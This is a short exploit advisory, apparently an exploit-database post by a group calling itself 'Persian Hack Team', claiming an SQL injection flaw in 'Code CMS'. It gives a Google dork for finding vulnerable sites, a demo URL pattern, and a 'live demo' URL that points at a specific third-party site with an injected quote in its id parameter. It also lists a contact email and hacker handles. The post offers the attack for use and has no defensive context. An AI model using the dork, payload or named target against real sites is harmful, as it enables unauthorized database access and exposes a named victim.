|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|------------------------------------------------------------------[+]
|[+] Exploit Title: Code CMS SQL Injection Vulnerability
|[+]
|[+] Exploit Author : Persian Hack Team
|[+]
|[+] Google Dork: intext:"Developed by Code Beacon"
|[+]
|[+] Tested on: Windows 8
|[+]
|[+] Date : 2016/07/07
|------------------------------------------------------------------[+]
|[+] PoC:
|[+] id Parameter Vulnerable To SQL Error :
|[+] 1-SQL Injection
|[+] Demo :
|[+] http://www.site.com/article.php?nid=[ID]
|[+]
|[+]
|[+] Live Demo :
|[+] http://www.meilab.com/en/general.php?id=1%27
|[+]
|[+]
|----------------------------------------------------------[+]
|[+] My Account :-
|[+]
|[+] ID:mmk.mohammad@yahoo.com
|[+]
|----------------------------------------------------[+]
|[+] discovered by :
|[+] Mr_Mask_Black
|[+]
|[+] My friends :
|[+] 1- Mojtaba Mobham
|[+] 2- T3NZOG4N
|[+] 3- FireKernel
|[+] 5- JOK3R
|[+] 6- Kian Error
|[+] 7- Arshia Danger
|[+] 8- Sir.hamid
|[+] 9- White Wolf
|[+]--------------------------------------------[+]
|[+] Homepage :
|[+] http://persian-team.ir
|[+]-------------------------------------------[+]
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|